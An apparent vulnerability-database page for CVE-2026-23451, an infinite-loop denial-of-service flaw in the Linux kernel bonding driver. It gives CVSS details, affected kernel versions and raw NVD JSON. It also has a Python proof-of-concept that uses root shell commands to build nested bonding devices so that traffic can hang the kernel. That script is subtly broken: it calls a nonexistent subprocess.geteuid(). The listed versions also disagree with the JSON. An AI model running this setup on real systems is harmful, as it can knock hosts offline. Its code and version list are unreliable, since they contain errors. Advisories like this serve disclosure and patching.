Security Vulnerability Report
中文
CVE-2026-23451 CVSS 7.5 HIGH

CVE-2026-23451

Published: 2026-04-03 16:16:31
Last Modified: 2026-05-21 00:30:22
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: bonding: prevent potential infinite loop in bond_header_parse() bond_header_parse() can loop if a stack of two bonding devices is setup, because skb->dev always points to the hierarchy top. Add new "const struct net_device *dev" parameter to (struct header_ops)->parse() method to make sure the recursion is bounded, and that the final leaf parse method is called.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:6.12.78:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.18.19:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel (修复提交 4172a7901cf43fe1cc63ef7a2ef33735ff7b7d13 之前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-23451 This script demonstrates the network configuration required to trigger the infinite loop in Linux Kernel's bonding driver. Vulnerability: Nested bonding devices cause bond_header_parse() to loop infinitely. """ import subprocess import sys def run_cmd(cmd): try: subprocess.run(cmd, check=True, shell=True) print(f"[+] Success: {cmd}") except subprocess.CalledProcessError as e: print(f"[-] Failed: {cmd}") sys.exit(1) def setup_vulnerable_env(): # 1. Load required modules run_cmd("modprobe bonding") run_cmd("modprobe dummy") # 2. Create underlying dummy devices run_cmd("ip link add dummy0 type dummy") run_cmd("ip link set dummy0 up") # 3. Create the first bond (Bond0) run_cmd("ip link add bond0 type bond mode 0") run_cmd("ip link set dummy0 master bond0") run_cmd("ip link set bond0 up") # 4. Create the second bond (Bond1) and enslave Bond0 (Nested Configuration) # This nesting creates the condition where skb->dev points to the top (Bond1) recursively. run_cmd("ip link add bond1 type bond mode 0") run_cmd("ip link set bond0 master bond1") run_cmd("ip link set bond1 up") print("\n[!] Vulnerable environment configured.") print("[!] Nested topology: Bond1 -> Bond0 -> dummy0") print("[!] Sending traffic through Bond1 may trigger the infinite loop in bond_header_parse().") if __name__ == "__main__": if subprocess.geteuid() != 0: print("[-] This script must be run as root.") sys.exit(1) setup_vulnerable_env()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23451", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-03T16:16:31.460", "lastModified": "2026-05-21T00:30:22.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: prevent potential infinite loop in bond_header_parse()\n\nbond_header_parse() can loop if a stack of two bonding devices is setup,\nbecause skb->dev always points to the hierarchy top.\n\nAdd new \"const struct net_device *dev\" parameter to\n(struct header_ops)->parse() method to make sure the recursion\nis bounded, and that the final leaf parse method is called."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.12.78:*:*:*:*:*:*:*", "matchCriteriaId": "493FF782-C903-4656-94E0-20B2D0EA024C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18.19:*:*:*:*:*:*:*", "matchCriteriaId": "6D24CF0E-E6F3-40B8-97C7-4913453B199F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19.9:*:*:*:*:*:*:*", "matchCriteriaId": "AB047D77-F8E9-431C-8103-B177734E5125"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4172a7901cf43fe1cc63ef7a2ef33735ff7b7d13", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/946bb6cacf0ccada7bc80f1cfa07c1ed79511c1c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9b49c854f14f5e2d493e562a1e28d2e57fe37371", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b7405dcf7385445e10821777143f18c3ce20fa04", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.